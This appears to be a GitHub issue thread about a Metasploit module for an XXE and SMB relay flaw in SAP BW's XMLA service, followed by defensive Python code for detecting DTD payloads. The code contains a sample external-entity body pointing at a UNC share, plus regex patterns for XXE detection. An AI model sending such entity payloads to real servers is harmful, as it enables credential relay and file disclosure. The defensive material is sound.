SAP /sap/bw/xml/soap/xmla XMLA service (XML DOCTYPE) SMB relay #1656
Trying to run it against a Windows installation results in the following error:
|
And test results on Linux, no access to file contents either:
|
Any clues? Am I doing something wrong to test this module?
works fine:
|
It's just the SMB relay part; isn't the XXE expansion vuln working? I don't see this module as complete if we can't read arbitrary remote files.
"An attacker can attempt to generate a "denial of service" situation or start an "SMB relay attack" using Document Type Definitions (DTD) via the SOAP/XMLA interface." ref: https://service.sap.com/sap/support/notes/1597066 Any file read attempt results in error: "Request transfered is not a valid XML/SOAP document". I think this is a red herring as far as arbitrary file read goes. Unless there is some trick I'm not aware of or haven't tried.
|
This module exploits the SAP NetWeaver BW XML External Entity vulnerability. An XML External Entities (XXE) issue exists within the XMLA service (XML DOCTYPE) function. The XXE vulnerability in SAP BW can lead to arbitrary file reading or an SMBRelay attack.
SAP Note 1597066 / DSECRG-12-033.
ref: http://erpscan.com/advisories/dsecrg-12-033-sap-basis-6-407-02-xml-external-entity
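For defenders, the DTD-based behaviour discussed in this thread can be caught at a proxy or log pipeline before it reaches the XMLA service. The following is an added example, not code from this pull request or from Metasploit: it flags any DOCTYPE in a request to the XMLA path (SOAP 1.1 forbids DTDs in messages) and classifies external identifiers, separating UNC targets (SMB relay risk) from local file reads. All function names and sample bodies are constructed for illustration.

```python
import re

XMLA_PATH = "/sap/bw/xml/soap/xmla"  # service path named in the issue title

_DOCTYPE = re.compile(r"<!DOCTYPE\b", re.I)
# External identifiers in <!DOCTYPE ...> or <!ENTITY ...>: SYSTEM "uri" / PUBLIC "id" "uri"
_EXTERNAL = re.compile(
    r"""<!(?P<decl>DOCTYPE|ENTITY)\s+(?:%\s+)?(?P<name>[^\s>\[]+)\s+
        (?:SYSTEM|PUBLIC\s+(?:"[^"]*"|'[^']*'))\s+
        (?P<q>["'])(?P<uri>.*?)(?P=q)""",
    re.I | re.X | re.S,
)

# Constructed sample bodies (not captured traffic); 192.0.2.10 is a documentation address
SAMPLE_UNC = b'<!DOCTYPE r [<!ENTITY x SYSTEM "\\\\192.0.2.10\\share\\a">]><r>&x;</r>'
SAMPLE_CLEAN = (b'<SOAP-ENV:Envelope xmlns:SOAP-ENV='
                b'"http://schemas.xmlsoap.org/soap/envelope/"><SOAP-ENV:Body/>'
                b'</SOAP-ENV:Envelope>')

def decode_body(raw: bytes) -> str:
    """Decode by BOM so a UTF-16 body cannot hide the DTD from the regexes."""
    if raw[:2] in (b"\xff\xfe", b"\xfe\xff"):
        return raw.decode("utf-16", errors="replace")
    return raw.decode("utf-8", errors="replace")

def classify_uri(uri: str) -> str:
    """Return 'unc', 'file', 'remote' or 'other' for an external identifier."""
    u = uri.strip().lower().replace("\\", "/")
    if u.startswith("file:"):
        # file://host/share and file://///host/share resolve to UNC paths on Windows
        return "unc" if re.match(r"//[^/]|/{4,}", u[5:]) else "file"
    if u.startswith("//"):
        return "unc"
    if re.match(r"(https?|ftp):", u):
        return "remote"
    return "other"

def inspect_xmla_request(path: str, raw_body: bytes) -> list:
    """Return findings as (kind, name, uri); an empty list means nothing flagged."""
    if not path.lower().startswith(XMLA_PATH):
        return []
    body = decode_body(raw_body)
    findings = [(classify_uri(m["uri"]), m["name"], m["uri"])
                for m in _EXTERNAL.finditer(body)]
    if not findings and _DOCTYPE.search(body):
        findings.append(("doctype", "", ""))  # internal-only DTD: still not valid SOAP
    return findings
```

A `unc` finding on a Windows host is the case SAP Note 1597066 describes as an SMB relay; a bare `doctype` finding covers the denial-of-service case from the same note.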